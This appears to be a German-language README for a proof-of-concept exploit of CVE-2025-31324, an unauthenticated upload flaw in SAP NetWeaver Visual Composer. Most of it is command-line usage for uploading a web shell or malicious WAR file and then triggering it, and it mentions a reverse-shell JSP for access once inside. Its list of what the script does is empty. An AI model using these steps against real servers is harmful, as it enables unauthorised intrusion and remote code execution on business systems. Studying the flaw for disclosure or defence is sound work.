
Proof-of-Concept für CVE-2025-31324: Nicht authentifizierter Upload in SAP NetWeaver Visual Composer Metadata Uploader
Proof-of-Concept für CVE-2025-31324: Unauthentifizierter Upload im SAP NetWeaver Visual Composer Metadata Uploader
Dieses Skript führt Folgendes aus:
Verwendungsbeispiel:
python3 PoC.py
--host sap.example.com --port 50000
--endpoint /irj/portal/sap/bc/webdynpro/sap/ZWDC_METADATA_UPLDR
--file EvilPayload.war
--trigger-path /irj/portal/irj/servlet_jsp/irj/root/EvilPayload/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https true
--bypass-portal
python3 PoC.py --host sap.example.com --port 50000
--endpoint /developmentserver/metadatauploader
--file shell.jsp
--trigger-path /visual_composer/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https
Sie haben auch die Möglichkeit, eine .war-Datei hochzuladen, falls Sie auf diese Weise ausführen möchten. cache.jsp ist eine Reverse Shell, die Ihnen Zugriff gewährt, sobald Sie sich im System befinden. (Ich arbeite noch an Problemen dort.)
Dies ist ausschließlich für Bildungszwecke gedacht und sollte nicht für böswillige Aktivitäten verwendet werden. Stellen Sie stets sicher, dass Sie die erforderlichen Berechtigungen haben und ethische Richtlinien befolgen, wenn Sie Sicherheitslücken testen oder erforschen.
Bei Fragen oder Unklarheiten können Sie sich gerne melden. Bleiben Sie sicher und geschützt!